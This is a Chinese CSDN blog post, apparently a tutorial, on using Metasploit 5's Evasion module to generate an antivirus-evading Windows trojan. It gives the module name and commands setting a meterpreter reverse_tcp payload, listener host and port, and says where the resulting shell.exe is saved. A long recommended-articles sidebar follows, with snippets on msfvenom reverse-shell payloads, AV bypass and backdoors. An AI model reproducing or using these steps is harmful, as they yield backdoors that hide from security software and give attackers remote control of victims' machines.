利用Metasploit制作免杀木马

原创 最后发布于2020-03-24 19:27:34 阅读数 127 收藏
发布于2020-03-24 19:27:34
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anquanzushiye/article/details/105085872
展开

请大家认真选择投票项,后续更新以此作为依据。

今日更新PPT内容11个,内容:数据安全,

CASB保护零信任环境的数据安全实践:

https://www.secshi.com/39625.html

以数据为中心的人工智能时代数据安全和隐私保护战略动力-GDPR的影响和对策:https://www.secshi.com/39547.html

数据安全的冰与火之歌 从 GDPR 看企业数据安全合规建设:https://www.secshi.com/39457.html

业务流量数据安全应用实践:https://www.secshi.com/39409.html

企业数据安全合规之路:https://www.secshi.com/39203.html

业务数据安全实践:https://www.secshi.com/39189.html

攻防对抗中数据安全的持续优化:https://www.secshi.com/39175.html

加快工业互联网数据安全能力建设 切实护航我国制造业高质量发展:https://www.secshi.com/39153.html

AiLPHA大数据安全分析应用于医疗网络安全闭环的实践:https://www.secshi.com/39145.html

数据安全的若干误解:https://www.secshi.com/39115.html

数据安全保障工程:https://www.secshi.com/39113.html

前言

Metasploit 5.0的时候更新一个Evasion模块,这个模块能非常快捷的生成反杀毒软件的木马,注意!低于5.0以下的版本是没有Evasion模块的,所以需要手动更新Metasploit

Metasploit更新

如果是使用kail的同学就直接使用msfupdate就能进行更新,如果是使用别的系统的小伙伴就请进入到Metasploit目录下面的bin目录下面,运行msfupdate

利用

打开metasploit

查看evasion模块

这里我们选择第五个模块

use windows/windows_defender_exe

查看需要配置的参数

show options

可以看到只有一个文件名的参数可以配置,我们就修改为shell.exe吧

紧接着我们要配置回显payload

set payload windows/meterpreter/reverse_tcp
set lhost you-ip
set lport 4444

使用exploit或者run 执行

看到回显信息我们可以看到木马存放在/root/.msf4/local/下面
我们来检测一下免杀效果

来自安全师作者GEIT,博客地址:http://www.geit.work/

「已注销」
发布了27 篇原创文章 · 获赞 0 · 访问量 3213
私信 关注
展开阅读全文
还能输入1000个字符

MSF生成meterpreter及静态

01-26 阅读数 3166

1.静态免杀1.1编译c文件,静态免杀1.1.1 生成shellcode在kali命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shi... 博文 来自: 渗透笔记

基于 msf 的杀项目的一些工具

08-01 阅读数 1060

https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自 信安之路这两个月来 持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神... 博文 来自: 3569

Metasploit生成杀恶意程序

05-09 阅读数 492

1.注意事项以下渗透测试坏境需要windows xp sp3,之前用的sp2,程序执行时一直报错提示找不到kernel.dll,其实是sp2系统不支持,是系统自身的问题。2.生成独立运行的二进制文件在... 博文 来自: maoyeyedezhihui的博客

利用meterpreter下的Venom杀后门

09-03 阅读数 162

转载请注明作者:admin-神风下载地址:https://github.com/r00t-3xp10it/venom1.从Github上下载框架:tar.gz OR zip OR git clone2... 博文 来自: weixin_30416497的博客

杀】————3、Excel 和 Metasploit

03-07 阅读数 278

这篇文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。简介这篇文章会继续讨论反向shell和规避杀毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一... 博文 来自: Fly_鹏程万里

Metasploit(msf)系列-木马

10-10 阅读数 4113

  木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。原理:    首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设... 博文 来自: Black Knight

metasploit 生成杀文件

01-26 阅读数 1883

一.利用python编译做免杀建议安装一个32位windows7,32位python2.7,pyinstaller-2.0,pywin32_2.7(小伙子在这里也试过其他版本的,但是感觉不稳定,大家也... 博文 来自: kkz的博客

Kalilinux——-Meterpreter持久控制服务器

03-03 阅读数 70

QQ 1274510382Wechat JNZ_aming商业合作 QQ群538250800技术搞事 QQ群599020441加入我们 QQ群649347320纪年科技aming网络安全 ... 博文 来自: aming小老弟

msf自

03-12 阅读数 48

1、专业术语渗透攻击(Exploit)攻击载荷(Payload)Shellcode模块(Module)监听器(Listener)2、msfvenom生成攻击载荷msfvenom集成了msfpayloa... 博文 来自: Xor0ne

Kali渗透-MSF木马杀技术

03-27 阅读数 263

裸奔木马1、在 Kali 中直接使用 Msfvenom 生成木马文件,不做任何免杀处理,如下图所示:2、在 Kali 开启 Apache 服务,同一局域网内的 Win 10 物理主机访问木马文件,尝试... 博文 来自: ClearSky

Metasploit实现木马生成、捆绑及杀学习笔记

07-21 阅读数 7486

本次实验通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。 msfvenom可以生成payload以及对payload编码免杀和避免坏字符、捆绑木马等。生成木马... 博文 来自: weixin_40602516的博客

杀测试】Kali之Metasploit几款工具杀练习

01-11 阅读数 6291

余磊 不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过... 博文 来自: 朔方飞絮谈安全

杀veil使用

02-02 阅读数 1万+

简介:Veil3.0可以将任意脚本或一段shellcode转换成Windows可执行文件,从而逃避了常见防病毒产品的检测,来自python3的Veil一直在更新。kali安装root@kali:~# ... 博文 来自: howtime4096的博客

【tool】远控杀专题文章-msfvenom隐藏的参数

01-18 阅读数 50

本节目录如下:msfvenom简介msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit... 博文 来自: qq_34965596的博客

Msfvenonm生成后门

01-27 阅读数 116

之前一篇文章通过以永恒之蓝漏洞为切入点详细的讲解了 Meterpreter 的用法.今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机... 博文 来自: 小谢的博客

使用MSF生成的shellcode打造杀payload

05-04 阅读数 9499

环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode :msfvenom -pwindows/meterpreter/... 博文 来自: MickeyMouse1928的博客

Bypass AV meterpreter杀技巧

03-19 阅读数 362

0x01 meterpreter简介MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcod... 博文 来自: weixin_30517001的博客

【Android编程实战】源码级杀_Dex动态加载技术_Metasploit安卓载荷傀儡机代码复现

11-03 阅读数 848

/文章作者:Kali_MG1937CSDN博客ID:ALDYS4QQ:3496925334/在读者阅读本文章前,建议先阅读笔者之前写的一篇对安卓载荷的分析文章【逆向&编程实战】Metasplo... 博文 来自: ALDYS4的博客

利用Metasploit制作PDF木马

11-06 阅读数 409

实验环境:kali-linux虚拟机(攻击机)、win7虚拟机(靶机)实验工具:Vmware、kali-linux的iso之前做了一个视频发现无法上传,此处就发一些过程截图吧。实验过程:一、攻击机端:... 博文 来自: #7的博客

MSF生成windows木马

10-22 阅读数 1025

msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线生成exe木马msfvenom -... 博文 来自: lenkee的博客

Kali的学习笔记篇(八)使用msf生成的shellcode制作杀payload

08-13 阅读数 3250

环境:    kali-linux-2018.2-amd.iso      Visual Studio 2017    msfvenom   更新时间:2018年8月13日07:06:43直接注入的生... 博文 来自: Kind&红衣的博客

内网渗透篇:反弹shell的N种姿势

08-30 阅读数 488

当你的才华还撑不起你的野心时那你就应该静下心来学习目录反弹shell的N种姿势0x01 前言反弹shell 是啥?反弹shell 的前因后果0x02 本次环境网络拓扑图0x03 bash直接反弹介绍0... 博文 来自: Agan 's Blog

利用metasploit生成杀后门

01-26 阅读数 3860

免杀之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。免杀有很多种方式,今天介绍一种利用msf生... 博文 来自: mirror97black的博客

windows下杀后门测试

12-10 阅读数 641

今天突发奇想整理测试下win下的免杀后门先占个坑,以后有时间慢慢写anti-virus测试网站  www.virustotal.com先测的是msf下的单编码捆绑大小基本未变msfvenom -p w... 博文 来自: GUINEW的博客

关于meterpreter的一个问题

11-06

各位大侠好,最近在做关于msf的实验时,是关于meterpreter的,当我设置完RHOST等的时候,输入exploit,就会报错: ``` msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2+ - lang:Chinese - Traditional [-] Could not determine the exact service pack [*] Auto-targeting failed, use 'show targets' to manually select one ``` 请问这个问题要怎么解决?目标机器(XP)跟实验机器(Kali 3.14)都是虚拟机里同一局域网的 问答

杀后门之MSF&Veil-Evasion的完美结合

10-14 阅读数 203

 本文由“即刻安全”投稿到“玄魂工作室”Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装... 博文 来自: weixin_33749242的博客

metasploit利用常见meterpreter脚本

01-31 阅读数 394

已存在的Meterpreter常见脚本getcountermeasure脚本检查受害者系统上的安全配置,并可以禁用其他安全措施,如防火墙等。“getgui”脚本用于在目标系统上启用RDP(远程桌面协议... 博文 来自: Yale的博客

vc++木马源码杀一些常用方法

05-04 阅读数 1431

vc++木马源码免杀一些常用方法1.字符串连接////////////////////////////////////////////////////////////把字符串"canxin"连接起来(... 博文 来自: 卿's Blog

kali linux木马杀工具

08-16 阅读数 870

1.Venom Shellcode Generator 博文 来自: 边城浪子的博客

记一次渗透实战【转】

07-10 阅读数 1099

记一次渗透实战【转】信息收集用dirsearch扫了一波目录没有发现什么东西直接用主站域名解析的ip访问发现主站是挂有cdn的subDomainsBrute 扫描子域名其中一个子域没挂CDN,由此找到... 博文 来自: 时光凉春衫薄的博客

在中国程序员是青春饭吗?

03-17 阅读数 14万+

今年,我也32了 ,为了不给大家误导,咨询了猎头、圈内好友,以及年过35岁的几位老程序员……舍了老脸去揭人家伤疤……希望能给大家以帮助,记得帮我点赞哦。目录:你以为的人生 一次又一次的伤害 猎头界的真... 博文 来自: 启舰

深析Synchronized关键字(小白慎入,深入jvm源码,两万字长文)

04-07 阅读数 4234

从jvm层面解析synchronized,看完绝对可以超越绝大数人 博文 来自: Java新生代

程序员请照顾好自己,周末病魔差点一套带走我。

03-13 阅读数 8万+

程序员在一个周末的时间,得了重病,差点当场去世,还好及时挽救回来了。... 博文 来自: 敖丙

卸载 x 雷某度!GitHub 标星 1.5w+,从此我只用这款全能高速下载工具!

12-29 阅读数 16万+

作者 | Rocky0429来源 | Python空间大家好,我是 Rocky0429,一个喜欢在网上收集各种资源的蒟蒻…网上资源眼花缭乱,下载的方式也同样千奇百怪,比如 BT 下载,磁力链接,网... 博文 来自: Rocky0429

超全Python图像处理讲解(多图预警)

04-07 阅读数 2952

文章目录Pillow模块讲解一、Image模块1.1 、打开图片和显示图片1.2、创建一个简单的图像1.3、图像混合(1)透明度混合(2)遮罩混合1.4、图像缩放(1)按像素缩放(2)按尺寸缩放1.5... 博文 来自: ZackSock的博客

20道你必须要背会的微服务面试题,面试一定会被问到

01-02 阅读数 4万+

这篇博客总结了面试中最常见的微服务面试题,相信对你有所帮助。 博文 来自: 扬帆向海的博客

为什么猝死的都是程序员,基本上不见产品经理猝死呢?

01-05 阅读数 10万+

相信大家时不时听到程序员猝死的消息,但是基本上听不到产品经理猝死的消息,这是为什么呢?我们先百度搜一下:程序员猝死,出现将近700多万条搜索结果:搜索一下:产品经理猝死,只有400万条的搜索结果,从搜... 博文 来自: 曹银飞的专栏

GitHub 总星 4w+!删库?女装?表情包?这些沙雕中文项目真是我每天快乐的源泉!

12-12 阅读数 1万+

大家好,我是 Rocky0429,一个喜欢在 GitHub 上瞎逛的蒟蒻…好看的皮囊千篇一律,有趣的灵魂没有底线。作为全球最大的同性交友网站,GayHub GitHub 上不止有鲜活的代码,秃头的算法... 博文 来自: Rocky0429

讲真,这两个IDE插件,可以让你写出质量杠杠的代码

01-10 阅读数 4万+

周末躺在床上看《拯救大兵瑞恩》周末在闲逛的时候,发现了两个优秀的 IDE 插件,据说可以提高代码的质量,我就安装了一下,试了试以后发现,确实很不错,就推荐给大家。01、Alibaba Java 代码规... 博文 来自: 沉默王二

毕业5年,我问遍了身边的大佬,总结了他们的学习方法

02-13 阅读数 14万+

我问了身边10个大佬,总结了他们的学习方法,原来成功都是有迹可循的。 博文 来自: 敖丙

Java C语言 Python C++ C# Visual Basic .NET JavaScript PHP SQL Go语言 R语言 Assembly language Swift Ruby MATLAB PL/SQL Perl Visual Basic Objective-C Delphi/Object Pascal Unity3D

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览